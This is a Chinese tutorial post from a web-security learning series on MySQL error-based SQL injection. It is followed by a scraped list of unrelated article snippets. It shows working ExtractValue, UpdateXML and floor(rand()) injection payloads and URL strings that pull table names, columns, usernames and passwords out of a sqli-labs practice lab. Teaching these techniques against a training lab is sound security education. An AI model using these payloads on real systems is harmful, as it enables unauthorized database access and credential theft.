f1a94e9a1ea7
f1a94e9a1ea7

一步一步学习 Web 安全 2.5 报错注入

原理

利用数据库某些机制让数据库报错,在报错中获取数据。有一点局限的是需要页面有错误回显。

场景

查询不回显内容,但是会打印错误信息

报错方法

这节主要说一下两类报错注入,涉及到 MySQL 的三个方法:

  1. xpath语法错误
    MySQL 5.1.5 版本中添加了对 XML 文档进行查询和修改的函数,分别是 ExtractValue() 和 UpdateXML()。
    因此在 mysql 小于 5.1.5 中不能用 ExtractValue 和 UpdateXML 进行报错注入。

(1)ExtractValue() 注入语句:

select * from user where id=1 and (extractvalue(1,concat(0x7e,(select > user()),0x7e)));

报错原理:
extractvalue() 的第二个参数要求是符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里

mysql> select * from user where id=1 and (extractvalue(1,concat(0x7e,(select > database()),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~test~'

mysql> select * from user where id=1 and (extractvalue(1,concat(0x7e,(select > table_name from information_schema.tables where > > > table_schema='test'),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~user~'

select * from user where id=1 and (extractvalue(1,concat(0x7e,(select > group_concat(comlumn_name) from information_schema.columns where > table_schema='test' and table_name='user'),00x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~id,Username,Age,Password~'

mysql> select * from user where id=1 and (extractvalue(1,concat(0x7e,(select > concat(id,'|',Username,'|',Password) from user where id=1),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~1|olivia|slimslim~'

mysql> select * from user where id=1 and (extractvalue(1,concat(0x7e,(select > group_concat(password) from user),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: > '~slimslim,meimima123,love_pwn,p@'

值得注意的是,extractvalue() 报错长度是有限制的,最长32位(从最后一句测试,也可以看出)。

(2)updatexml() 注入语句

select * from user where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

报错原理和 extractvalue() 是一样的

  1. count()+rand()+group_by()导致逐渐重复
    利用了count()和group by在遇到rand()产生的重复值时报错的思路。
    详细原理可以阅读 mysql的floor()报错注入方法详细分析。
    注入语句:
select count(*) from test group by concat(version(),floor(rand(0)*2));

练习

依旧用 sqli-labs 的 less-1,如果还没有安装 sqli-labs,可以参考 sqli-labs 的安装。

  1. floor():
    输入:?id=1' and (select count() from information_schema.tables group by concat((select version()),floor(rand(0)2))) --+
    页面返回了:Duplicate entry '5.7.261' for key '',成功注入,这时只要替换其中的『select version』就可以获取其他数据。

(1)表名:
?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2))) --+
(2)列名:
?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e,floor(rand(0)*2))) --+
(3)数据:
?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select username from users limit 0,1),0x7e,floor(rand(0)*2))) --+

  1. ExtractValue() 和 UpdateXML() 和 floor 差不多,也是将查询语句替换即可。

上一节:一步一步学习 Web 安全 2.4 之 mysql union 联合查询注入
下一节:一步一步学习 Web 安全 2.6 之布尔盲注

你可能感兴趣的:(一步一步学习 Web 安全 2.5 报错注入)

  • 分布式光伏电站经济性指标优化分析 罗思付之技术屋 网络通信安全及科学技术专栏分布式
    摘要结合工程经验,分析了工商业分布式光伏电站平准发电成本(LevelizedCostofEnergy,LCOE)、资本金内部收益率(InternalRateofReturn,IRR)的主要影响因素,其中平准发电成本主要受静态投资影响,资本金内部收益率主要受消纳比影响。针对上述影响因素,进一步讨论了LCOE、IRR指标优化方法与在工程项目中可选用的举措。最后,结合实际项目背景,在站址条件、组件瓦单价
  • Pycharm中import torch报错解决方案(Python+Pycharm+Pytorch cpu版) 波波仔86 人工智能pythonpycharmpytorchimport解释器配置
    pycharm环境搭建完毕后,编写一个py文件demo,importtorch报错,提示没有。设置python解释器:选择conda环境,使用现有环境,conda执行文件找到Anaconda安装路径下Scripts文件夹内的conda.exe,最后选择含有torch软件包的虚拟环境,题主创建名为pytorch。创建完解释器后,下方会显示出该解释器/虚拟环境下的所有软件包,看到有pytorch包即选
  • 【开源代码解读】AI检索系统R1-Searcher通过强化学习RL激励大模型LLM的搜索能力 accurater 人工智能深度学习R1-Searcher
    关于R1-Searcher的报告:第一章:引言-AI检索系统的技术演进与R1-Searcher的创新定位1.1信息检索技术的范式转移在数字化时代爆发式增长的数据洪流中,信息检索系统正经历从传统关键词匹配到语义理解驱动的根本性变革。根据IDC的统计,2023年全球数据总量已突破120ZB,其中非结构化数据占比超过80%。这种数据形态的转变对检索系统提出了三个核心的挑战:语义歧义消除:如何准确理解"A
  • 使用flask快速搭建web应用 alex190824 flask前端pythonecharts
    文章目录前言一、Flask是什么?二、使用步骤1.引入包2.简单的服务端应用程序3.添加用于显示折线图代码4.在templates目录下,创建用于渲染的line-simple.html页面5.完整的代码结构前端代码后端代码总结前言在数据处理分析过程中,有快速搭建数据展示的应用场景需求,此时可以使用Flask快速进行web应用环境构建。本示例演示创建web应用及显示渲染echart折线图。一、Fla
  • 全国产飞腾+FPGA架构,支持B码+12网口+多串电力通讯管理机解决方案 深圳信迈科技DSP+ARM+FPGA 飞腾+FPGA电力新能源fpga开发架构电力通讯管理机全国产
    行业痛点:中国的电力网络已经成为当今世界覆盖范围最广、结构最为复杂的人造科技系统。随着国家和各部委颁布了一系列法律法规,如国家颁布的《中华人民共和国网络安全法》、工信部颁布的《工业控制系统信息安全防护指南》、发改委颁布的14号令《电力监控系统安全防护规定》、国家能源局颁布的《关于印发电力监控系统安全防护总体方案等安全防护方案和评估规范的通知》,凸显了电力行业的网络安全防护工作的重要性。基于电力行业
  • flask--基础知识点--6--flask高并发处理 Raging__Fire #flaskpythonflask
    Flask是一个轻量级的PythonWeb框架,适合构建中小型应用。但是,对于高并发场景,Flask本身可能需要一些辅助工具和配置来提升性能。以下是一些优化Flask应用以处理高并发的方法:1.使用WSGI服务器Flask自带的开发服务器性能和稳定性不足以应对生产环境中的高并发请求,可以考虑使用更强大的WSGI服务器,如:Gunicorn:一个基于Python的WSGIHTTP服务器。uWSGI:
  • webgl threejs 云渲染(服务器渲染、后端渲染)解决方案 allenjiao Threejswebglthreejs云渲染后端渲染服务器渲染云流化三维云渲染
    云渲染和流式传输共享三维模型场景1、本地无需高端GPU设备即可提供三维项目渲染云渲染和云流化媒体都可以让3D模型共享变得简单便捷。配备强大GPU的远程服务器早就可以处理密集的处理工作,而专有应用程序,用户也可以从任何个人设备查看全保真模型并与之交互。2、云流媒体实现多终端联动共享价值更高在项目应用场景中,在大屏、电脑、平板、手机和其它移动终端,可以实现多屏联动、远程协助,三维云流化让客户访问时可以
  • 2025-03-14 学习记录--C/C++-PTA 习题2-1 求整数均值 小呀小萝卜儿 学习-C/C++学习c语言
    合抱之木,生于毫末;九层之台,起于累土;千里之行,始于足下。一、题目描述⭐️习题2-1求整数均值本题要求编写程序,计算4个整数的和与平均值。题目保证输入与输出均在整型范围内。输入格式:输入在一行中给出4个整数,其间以空格分隔。输出格式:在一行中按照格式“Sum=和;Average=平均值”顺序输出和与平均值,其中平均值精确到小数点后一位。输入样例:1234输出样例:Sum=10;Average=2
  • 【python error】cannot import name ‘TorchDispatchMode‘ from ‘torch.utils._python_dispatch‘ Eternal-Student JetsonOrinNXPythonpython开发语言
    报错:cannotimportname‘TorchDispatchMode’from‘torch.utils._python_dispatch’(/home/nvidia/.conda/envs/pytorch/lib/python3.8/site-packages/torch/utils/_python_dispatch.py)File“/media/nvidia/Ubuntu/xxxxx/ev
  • uni-app打包h5并部署到nginx,路由模式history 星月昭铭 前端杂项Vueuni-appnginx
    uni-app打包有些坑,当时运行的基础路径填写了./,导致在二级页面刷新之后,页面直接空白。就只能换一个路径了,nginx也要跟着改,下面是具体步骤。manifest.json配置web运行路径写/h5/,或者写你们网站的目录,比如我这里写了h5,到时候访问的地址就是127.0.0.1/h5,对,带了一个h5nginx配置需要在nginx里面配置一个/h5配置,然后我这里还配置了一个locati
  • Uniapp当中的scroll-view滚动条不出现或者触底刷新事件不触发 堕落年代 uniappuni-app
    一、未正确设置容器高度问题描述scroll-view未设置明确高度或高度值无效,导致无法形成有效滚动区域。解决方案•使用行内样式直接设置height(如style="height:500rpx;"),避免类名样式被覆盖。•动态计算高度(例如通过uni.getSystemInfoSync()获取屏幕剩余高度)。二、滚动条样式被覆盖或隐藏问题描述•默认滚动条被全局CSS样式(如::-webkit-sc
  • SQLite学习(十一)使用JDBC读写SQLite数据,基于Java实现 Designer 小郑 SQLite从入门到实战sqlite数据库sqljavajdbc
    1.前言2.基础工作2.1创建Java项目2.2依赖Jar包3.连接SQLite4.查询SQLite数据5.新增SQLite数据6.总结1.前言在上一篇《SQLite学习(十)SQLite的注入问题的防范、数据库文件导入和导出》中,讲解了SQLite的SQL注入问题和应对措施,在本篇博客中,将继续讲解如何使用JDBC读写SQLite数据。同学们将学习到:JDBC是什么使用JDBC读写SQLite请
  • uniapp vue3项目用原生h5 audioContext实现语音文件倍速播放,可适应h5和安卓app 努力做大神 uni-appandroid音频倍速播放
    前言uniapp项目要做类似微信的聊天语音播放功能,可以切换语音,可以点击切换播放/停止播放状态,还可以倍速播放。开始用了uniapp的音频组件uni.createInnerAudioContext(),很好用但就是倍速播放playbackRate属性不起作用,经过研究,决定用原生h5的audioContext。AudioContext是WebAudioAPI的一部分,它代表了一个音频处理图,允许
  • uni-app微信小程序报错:更改appid失败touristappid Error:tourist appid 努力做大神 小程序小程序uni-app
    事情是这样的,我用HbuilderX新建了一个uni-app小程序,然后运行到微信开发者工具,原本正常开发,后来我在微信开发者工具中,把project.config.json文件中的“appid”:“touristappid”,改为了一个我之前开发过的小程序的appid,然后保存文件报错。撤回更改后仍报错。这时无法改回默认的touristappid。我打开微信开发者工具,点击新建小程序,生成一个测
  • springboot新手入门搭建项目 stayhungerstayflush springboot后端java
    SpringBoot新手入门指南:从原理到实践一、SpringBoot简介SpringBoot是基于Spring框架的快速开发脚手架,通过约定优于配置的设计理念,简化了Spring应用的初始化搭建和开发过程。主要优势包括:内嵌Web服务器(Tomcat/Jetty)自动配置Spring和第三方库提供生产级监控端点无需XML配置二、核心概念解析1.自动配置(Auto-Configuration)@S
  • 论文写作篇#6:在C会里,YOLO文章的摘要怎么写?Conclusion怎么写?摘要和Conclusion有哪些区别? hjs_deeplearning YOLO人工智能深度学习计算机视觉
    前两次学习中,我们学习了C会YOLO论文的结构和消融实验的写法论文写作篇#5:想发C会,YOLO的消融实验AblationExperiment/Study怎么写?-CSDN博客https://blog.csdn.net/hjs314159/article/details/146261468?spm=1001.2014.3001.5502论文写作篇#4:YOLO还能发C会论文吗?C会论文的YOLO文
  • 开源应用驱动企业新质生产力:Websoft9以EPP+AI+知识库助您领跑未来 开源
    开源应用驱动企业新质生产力:Websoft9以EPP+AI+知识库助您领跑未来在数字化转型加速的今天,企业新质生产力的核心已从传统资源投入转向技术驱动的效率革命。开源应用凭借其灵活性、成本优势和技术创新力,成为企业实现这一目标的关键引擎。作为开源技术与行业场景化落地的领航者,Websoft9通过企业应用平台(EPP)、AI智能引擎与知识库系统三位一体的解决方案,助力企业快速构建新一代生产力工具,实
  • HarmonyOS NEXT 使用AppStorageV2实现全屏展示 架构教育
    在鸿蒙原生开发中,为了实现沉浸式效果,通常在页面中通过设置expandSafeArea属性向顶部和底部扩展安全区实现沉浸式效果,.expandSafeArea([SafeAreaType.SYSTEM],[SafeAreaEdge.TOP,SafeAreaEdge.BOTTOM]);设置完成后,发现没有实现想要的效果,就需要点击ArkUIInspector查看当前展示试图层级中,哪些试图没有实现沉
  • Web三要素:HTML之ARIA可访问性(3) 双囍菜菜 前端随记前端html服务器ARIA
    ARIA:为Web构建数字盲道的技术革命文章目录ARIA:为Web构建数字盲道的技术革命一、屏幕背后的黑暗世界:一个被忽视的用户群体1.1触目惊心的现实案例1.2法律合规的达摩克利斯之剑二、ARIA技术体系的三重维度2.1角色(Roles):定义元素身份常用角色分类2.2属性(Properties):描述元素特征关键属性矩阵2.3状态(States):反映动态变化状态同步机制三、ARIA实战:构建
  • 非对称加密:SSL/TLS握手的数学基石 安全
    1.密钥交换的密码学困局在未加密的HTTP通信中,攻击者可通过中间人攻击(MITM)窃听或篡改数据。SSL/TLS协议的核心挑战在于:如何在不安全的信道上建立安全通信?这本质上是一个“密钥分发问题”——若使用对称加密(如AES),双方需要共享同一密钥,但密钥本身如何安全传递?非对称加密的突破性在于公钥与私钥的分离。以RSA算法为例,其数学基础是大质数分解难题:选择两个大质数p和q(通常≥2048位
  • 守护网站安全的隐形卫士——SSL证书全解析 安全
    在网络世界中,保护用户数据的安全至关重要。无论你是经营一家小型网店还是管理大型企业网站,确保客户信息的安全性都是不可忽视的任务。今天,我们就来揭开一个默默守护网站安全的重要角色——SSL证书的神秘面纱。什么是SSL证书?SSL(SecureSocketsLayer)证书是一种数字证书,用于加密客户端与服务器之间的通信,确保数据传输过程中的安全性。简单来说,当您访问一个启用SSL证书的网站时,您的浏
  • 短视频时代,普通人如何保护个人隐私?——从SSL证书看数据安全 安全
    在短视频时代,每天数以亿计的用户上传内容、互动评论、甚至进行直播购物。然而,这些行为背后潜藏着隐私泄露的风险:账号密码被盗、支付信息被窃取、个人数据遭篡改……如何在这些场景中保护隐私?SSL证书作为互联网安全的基石,正扮演着关键角色。本文将从技术原理到实践建议,为你揭开SSL证书如何成为隐私保护的“隐形盾牌”。一、SSL证书:隐私保护的第一道防线SSL(SecureSocketsLayer)证书是
  • 千问大模型携手超算互联网:算力驱动下的安全新征程 安全
    一、技术革命的新纪元:从“火种”到“燎原”2025年3月,中国国家超算互联网平台宣布接入阿里巴巴“千问QwQ-32B”大模型。这一事件,标志着人类算力资源整合迈入新阶段——超算中心不再仅是巨型计算机的集合,而是演化为承载智能的“数字大脑”。用户可通过平台免费调用百万级Token的计算资源,如同古希腊神话中普罗米修斯盗火予人,超算互联网正将“智能之火”播撒至科研、工业乃至普通开发者手中。然而,火种既
  • HarmonyOS NEXT 将ArrayBuffer压缩到指定大小并转化为base64返回 架构教育
    项目中有需求要对获取的图片进行压缩,并且是要压缩到固定大小,考虑到harmonyos中对图片质量压缩方式packing,压缩后要及时检查大小,就使用while循环一步步的压缩,直至压缩到目标值letbitmap:ArrayBuffer;//需要压缩的数据letcompressSize:number;//目标大小letconsiderBase64:boolean;//是否考虑base64算法把字节数
  • 天吉智芯「星核」智能充气泵 —— 以芯为核,定义车载充气新标杆 天吉智芯 人工智能
    一、品牌基因:12年车规级芯片的技术沉淀天吉智芯(TJX-CHIP)作为深圳天吉芯技术旗下高端品牌,深耕汽车电子领域12年,累计交付超500万颗车规级MCU芯片。「星核」充气泵是品牌首款终端产品,搭载自主研发的TJX8F003Pro车规级芯片(IATF16949认证),以芯片级定制重构充气泵的智能边界——不止是工具,更是汽车安全生态的智能终端。二、产品定位:全场景胎压管家,重新定义「可靠」目标用户
  • 嵌入式AI必备技能2-模型的压缩与加速 奥德彪123 嵌入式AI人工智能嵌入式
    嵌入式AI必备技能2-模型的压缩与加速引言随着嵌入式AI设备的广泛应用,模型的计算效率和存储需求成为核心挑战。由于嵌入式系统通常资源受限,传统的深度学习模型往往难以直接部署。因此,模型压缩和加速技术应运而生,旨在减少计算量、降低存储需求,同时尽可能保持模型的准确性。本文介绍几种常见的模型压缩与加速方法,包括剪枝、低秩分解、量化、权值共享、知识蒸馏等,并探讨如何综合应用这些技术来优化AI模型。1.常
  • JVM性能监控与调优 小码快撩 jvm
    导语JVM性能监控与调优是一个涵盖多个层面的复杂任务,涉及对JVM内部工作原理的理解、性能指标的监控、问题定位与优化策略的实施。以下是学习JVM性能监控与调优时应关注的主要技术点1.JVM基础知识JVM性能监控与调优之JVM基础知识在进行JVM性能监控与调优之前,深入理解JVM的基本知识是至关重要的。以下概述了JVM性能监控与调优所需掌握的核心基础知识:1.JVM内存区域划分堆内存(Heap):存
  • 数据标注工具及其对预训练模型性能的影响 AGI大模型与大数据研究院 DeepSeekR1&大数据AI人工智能计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    1.背景介绍1.1预训练模型的崛起近年来,预训练模型(Pre-trainedModels)在自然语言处理(NLP)领域取得了显著的成功。这些模型通过在大规模无标注文本数据集上进行预训练,学习到丰富的语言知识和语义表示,并在下游任务中展现出优异的性能。BERT、GPT-3等预训练模型的出现,标志着NLP领域进入了一个新的时代。1.2数据标注的重要性尽管预训练模型展现出强大的能力,但它们仍然需要针对特
  • 数据标注质量对AI模型质量的影响分析 自由鬼 行业发展IT应用探讨人工智能机器学习深度学习AI
    上、数据标注质量与AI模型的质量关系数据标注是AI最基础的工作,数据标注的质量决定了AI质量,影响数据标注质量的是数据标注的规则。1、数据标注是AI最基础的工作:数据标注是构建高质量AI模型的基石:数据标注尤其是在监督学习范式下,是AI领域最基础、最关键的工作之一。没有高质量的标注数据,就如同建造高楼大厦没有坚实的地基,AI模型就无法有效地学习和训练,最终的AI质量也就无从谈起。训练数据是AI模型
  • 【JVM】性能监控与调优概述篇 白晨并不是很能熬夜 JVMjvm后端面试java经验分享求职招聘
    大家好,我是白晨,一个不是很能熬夜,但是也想日更的人✈。如果喜欢这篇文章,点个赞,关注一下白晨吧!你的支持就是我最大的动力!文章目录JVM性能监控与调优概述篇背景说明生产环境中的问题为什么要调优不同阶段的考虑调优概述监控的依据调优的大方向性能优化的步骤第一步(发现问题):性能监控第二步(排查问题):性能分析第三步(解决问题):性能调优性能评价/测试指标停顿时间(或响应时间)吞吐量并发数内存站用相互
  • apache ftpserver-CentOS config gengzg apache
    <server xmlns="http://mina.apache.org/ftpserver/spring/v1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://mina.apache.o
  • 优化MySQL数据库性能的八种方法 AILIKES sqlmysql
    1、选取最适用的字段属性   MySQL可以很好的支持大数据量的存取,但是一般说来,数据库中的表越小,在它上面执行的查询也就会越快。因此,在创建表的时候,为了获得更好的 性能,我们可以将表中字段的宽度设得尽可能小。例如,在定义邮政编码这个字段时,如果将其设置为CHAR(255),显然给数据库增加了不必要的空间,甚至使用VARCHAR这种类型也是多余的,因为CHAR(6)就可以很
  • JeeSite 企业信息化快速开发平台 Kai_Ge JeeSite
    JeeSite 企业信息化快速开发平台 平台简介 JeeSite是基于多个优秀的开源项目,高度整合封装而成的高效,高性能,强安全性的开源Java EE快速开发平台。 JeeSite本身是以Spring Framework为核心容器,Spring MVC为模型视图控制器,MyBatis为数据访问层, Apache Shiro为权限授权层,Ehcahe对常用数据进行缓存,Activit为工作流
  • 通过Spring Mail Api发送邮件 120153216 邮件main
    原文地址:http://www.open-open.com/lib/view/open1346857871615.html 使用Java Mail API来发送邮件也很容易实现,但是最近公司一个同事封装的邮件API实在让我无法接受,于是便打算改用Spring Mail API来发送邮件,顺便记录下这篇文章。 【Spring Mail API】 Spring Mail API都在org.spri
  • Pysvn 程序员使用指南 2002wmj SVN
    源文件:http://ju.outofmemory.cn/entry/35762 这是一篇关于pysvn模块的指南. 完整和详细的API请参考 http://pysvn.tigris.org/docs/pysvn_prog_ref.html. pysvn是操作Subversion版本控制的Python接口模块. 这个API接口可以管理一个工作副本, 查询档案库, 和同步两个. 该
  • 在SQLSERVER中查找被阻塞和正在被阻塞的SQL 357029540 SQL Server
    SELECT  R.session_id AS BlockedSessionID ,          S.session_id AS BlockingSessionID ,          Q1.text AS Block
  • Intent 常用的用法备忘 7454103 .netandroidGoogleBlogF#
    Intent     应该算是Android中特有的东西。你可以在Intent中指定程序 要执行的动作(比如:view,edit,dial),以及程序执行到该动作时所需要的资料 。都指定好后,只要调用startActivity(),Android系统 会自动寻找最符合你指定要求的应用 程序,并执行该程序。 下面列出几种Intent 的用法 显示网页:
  • Spring定时器时间配置 adminjun spring时间配置定时器
    红圈中的值由6个数字组成,中间用空格分隔。第一个数字表示定时任务执行时间的秒,第二个数字表示分钟,第三个数字表示小时,后面三个数字表示日,月,年,< xmlnamespace prefix ="o" ns ="urn:schemas-microsoft-com:office:office" /> 测试的时候,由于是每天定时执行,所以后面三个数
  • POJ 2421 Constructing Roads 最小生成树 aijuans 最小生成树
    来源:http://poj.org/problem?id=2421 题意:还是给你n个点,然后求最小生成树。特殊之处在于有一些点之间已经连上了边。 思路:对于已经有边的点,特殊标记一下,加边的时候把这些边的权值赋值为0即可。这样就可以既保证这些边一定存在,又保证了所求的结果正确。 代码: #include <iostream> #include <cstdio>
  • 重构笔记——提取方法(Extract Method) ayaoxinchao java重构提炼函数局部变量提取方法
    提取方法(Extract Method)是最常用的重构手法之一。当看到一个方法过长或者方法很难让人理解其意图的时候,这时候就可以用提取方法这种重构手法。   下面是我学习这个重构手法的笔记:   提取方法看起来好像仅仅是将被提取方法中的一段代码,放到目标方法中。其实,当方法足够复杂的时候,提取方法也会变得复杂。当然,如果提取方法这种重构手法无法进行时,就可能需要选择其他
  • 为UILabel添加点击事件 bewithme UILabel
        默认情况下UILabel是不支持点击事件的,网上查了查居然没有一个是完整的答案,现在我提供一个完整的代码。   UILabel *l = [[UILabel alloc] initWithFrame:CGRectMake(60, 0, listV.frame.size.width - 60, listV.frame.size.height)]
  • NoSQL数据库之Redis数据库管理(PHP-REDIS实例) bijian1013 redis数据库NoSQL
    一.redis.php <?php //实例化 $redis = new Redis(); //连接服务器 $redis->connect("localhost"); //授权 $redis->auth("lamplijie"); //相关操
  • SecureCRT使用备注 bingyingao secureCRT每页行数
    SecureCRT日志和卷屏行数设置 一、使用securecrt时,设置自动日志记录功能。 1、在C:\Program Files\SecureCRT\下新建一个文件夹(也就是你的CRT可执行文件的路径),命名为Logs; 2、点击Options -> Global Options -> Default Session -> Edite Default Sett
  • 【Scala九】Scala核心三:泛型 bit1129 scala
    泛型类 package spark.examples.scala.generics class GenericClass[K, V](val k: K, val v: V) { def print() { println(k + "," + v) } } object GenericClass { def main(args: Arr
  • 素数与音乐 bookjovi 素数数学haskell
        由于一直在看haskell,不可避免的接触到了很多数学知识,其中数论最多,如素数,斐波那契数列等,很多在学生时代无法理解的数学现在似乎也能领悟到那么一点。     闲暇之余,从图书馆找了<<The music of primes>>和<<世界数学通史>>读了几遍。其中素数的音乐这本书与软件界熟知的&l
  • Java-Collections Framework学习与总结-IdentityHashMap BrokenDreams Collections
            这篇总结一下java.util.IdentityHashMap。从类名上可以猜到,这个类本质应该还是一个散列表,只是前面有Identity修饰,是一种特殊的HashMap。         简单的说,IdentityHashMap和HashM
  • 读《研磨设计模式》-代码笔记-享元模式-Flyweight bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.Collection; import java.util.HashMap; import java.util.List; import java
  • PS人像润饰&调色教程集锦 cherishLC PS
      1、仿制图章沿轮廓润饰——柔化图像,凸显轮廓 http://www.howzhi.com/course/retouching/   新建一个透明图层,使用仿制图章不断Alt+鼠标左键选点,设置透明度为21%,大小为修饰区域的1/3左右(比如胳膊宽度的1/3),再沿纹理方向(比如胳膊方向)进行修饰。   所有修饰完成后,对该润饰图层添加噪声,噪声大小应该和
  • 更新多个字段的UPDATE语句 crabdave update
    更新多个字段的UPDATE语句                    update tableA a set (a.v1, a.v2, a.v3, a.v4) = --使用括号确定更新的字段范围
  • hive实例讲解实现in和not in子句 daizj hivenot inin
    本文转自:http://www.cnblogs.com/ggjucheng/archive/2013/01/03/2842855.html 当前hive不支持 in或not in 中包含查询子句的语法,所以只能通过left join实现。 假设有一个登陆表login(当天登陆记录,只有一个uid),和一个用户注册表regusers(当天注册用户,字段只有一个uid),这两个表都包含
  • 一道24点的10+种非人类解法(2,3,10,10) dsjt 算法
    这是人类算24点的方法?!!! 事件缘由:今天晚上突然看到一条24点状态,当时惊为天人,这NM叫人啊?以下是那条状态 朱明西 : 24点,算2 3 10 10,我LX炮狗等面对四张牌痛不欲生,结果跑跑同学扫了一眼说,算出来了,2的10次方减10的3次方。。我草这是人类的算24点啊。。 然后么。。。我就在深夜很得瑟的问室友求室友算 刚出完题,文哥的暴走之旅开始了 5秒后
  • 关于YII的菜单插件 CMenu和面包末breadcrumbs路径管理插件的一些使用问题 dcj3sjt126com yiiframework
    在使用 YIi的路径管理工具时,发现了一个问题。                    <?php         
  • 对象与关系之间的矛盾:“阻抗失配”效应[转] come_for_dream 对象
    概述   “阻抗失配”这一词组通常用来描述面向对象应用向传统的关系数据库(RDBMS)存放数据时所遇到的数据表述不一致问题。C++程序员已经被这个问题困扰了好多年,而现在的Java程序员和其它面向对象开发人员也对这个问题深感头痛。   “阻抗失配”产生的原因是因为对象模型与关系模型之间缺乏固有的亲合力。“阻抗失配”所带来的问题包括:类的层次关系必须绑定为关系模式(将对象
  • 学习编程那点事 gcq511120594 编程互联网
    一年前的夏天,我还在纠结要不要改行,要不要去学php?能学到真本事吗?改行能成功吗?太多的问题,我终于不顾一切,下定决心,辞去了工作,来到传说中的帝都。老师给的乘车方式还算有效,很顺利的就到了学校,赶巧了,正好学校搬到了新校区。先安顿了下来,过了个轻松的周末,第一次到帝都,逛逛吧! 接下来的周一,是我噩梦的开始,学习内容对我这个零基础的人来说,除了勉强完成老师布置的作业外,我已经没有时间和精力去
  • Reverse Linked List II hcx2013 list
    Reverse a linked list from position m to n. Do it in-place and in one-pass. For example:Given 1->2->3->4->5->NULL, m = 2 and n = 4, return 
  • Spring4.1新特性——页面自动化测试框架Spring MVC Test HtmlUnit简介 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • Hadoop集群工具distcp liyonghui160com
        1. 环境描述 两个集群:rock 和 stone rock无kerberos权限认证,stone有要求认证。 1. 从rock复制到stone,采用hdfs Hadoop distcp -i hdfs://rock-nn:8020/user/cxz/input hdfs://stone-nn:8020/user/cxz/运行在rock端,即源端问题:报版本
  • 一个备份MySQL数据库的简单Shell脚本 pda158 mysql脚本
      主脚本(用于备份mysql数据库):   该Shell脚本可以自动备份 数据库。只要复制粘贴本脚本到文本编辑器中,输入数据库用户名、密码以及数据库名即可。我备份数据库使用的是mysqlump 命令。后面会对每行脚本命令进行说明。    1. 分别建立目录“backup”和“oldbackup”   #mkdir /backup   #mkdir /oldbackup  
  • 300个涵盖IT各方面的免费资源(中)——设计与编码篇 shoothao IT资源图标库图片库色彩板字体
    A. 免费的设计资源 Freebbble:来自于Dribbble的免费的高质量作品。 Dribbble:Dribbble上“免费”的搜索结果——这是巨大的宝藏。 Graphic Burger:每个像素点都做得很细的绝佳的设计资源。 Pixel Buddha:免费和优质资源的专业社区。 Premium Pixels:为那些有创意的人提供免费的素材。
  • thrift总结 - 跨语言服务开发 uule thrift
    官网 官网JAVA例子 thrift入门介绍 IBM-Apache Thrift - 可伸缩的跨语言服务开发框架 Thrift入门及Java实例演示 thrift的使用介绍   RPC    POM: <dependency> <groupId>org.apache.thrift</groupId>
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他